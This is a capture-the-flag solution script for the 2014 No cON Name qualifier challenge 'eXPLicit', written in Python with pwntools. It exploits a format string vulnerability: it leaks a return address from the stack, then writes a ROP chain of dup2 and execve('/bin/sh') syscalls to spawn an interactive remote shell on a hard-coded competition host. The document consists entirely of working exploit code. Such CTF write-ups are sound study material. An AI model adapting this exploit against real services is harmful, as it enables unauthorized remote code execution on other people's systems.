No cON Name CTF Quals 2014 - eXPLicit

explicit.py

# -*- coding: utf-8 -*-
import os
import sys
import time
import re
from pwn import *
from libformatstr import *

REMOTE = 0

if REMOTE:
    host = '88.87.208.163'
    port = 7070
else:
    host = '127.0.0.1'
    port = 7070

def connect():
    return remote(host, port)

def retrieve_val(res):
    m = re.search('Your number is (.+) which is too low.', res)
    if m:
        leak = m.group(1)
        return leak
    else:
        return None

def dump_stack():
    for i in range(1, 100):
        payload = (
            "%%%d$x" % i +
            '\n'
        )
        s.sendafter('Pick a number between 0 and 20: ', payload)
        res = s.recvuntil('which is too low.')
        leak = retrieve_val(res)
        if leak:
            print '%d: %s' % (i, leak)
        else:
            print buf
    s.interactive()

def send_fmt(payload):
    s.sendafter('Pick a number between 0 and 20: ', payload + '\n')

bss = 0x80d6080 + 0x100

int80 = 0x8082715  # int 0x80; ret
popeax = 0x80a8ff6 # pop eax; ret
popecx_ebx = 0x8060a7d # pop ecx; pop ebx; ret
popedx_ecx_ebx = 0x8060a7c # pop edx; pop ecx; pop ebx; ret

s = connect()

#dump_stack()

send_fmt('%69$x')
buf = s.recvuntil('which is too low.')
retaddr = int(retrieve_val(buf), 16) - 76 # offset
log.info('retaddr = %x' % retaddr)

# dup2(4, 0)
p = FormatStr()
p[retaddr] = [popeax, 0x3f, popecx_ebx, 0, 0x4, int80]
send_fmt(p.payload(6))
retaddr += 4*6

# dup2(4, 1)
p = FormatStr()
p[retaddr] = [popeax, 0x3f, popecx_ebx, 1, 0x4, int80]
send_fmt(p.payload(6))
retaddr += 4*6

# execve("/bin/sh", ["/bin/sh", NULL], NULL)
p = FormatStr()
p[retaddr] = [popeax, 0x0b, popedx_ecx_ebx, 0, bss, bss+4*2, int80]
send_fmt(p.payload(6))

# ["/bin/sh", NULL]
p = FormatStr()
p[bss] = [bss+4*2, 0, '/bin/sh']
send_fmt(p.payload(6))

s.interactive()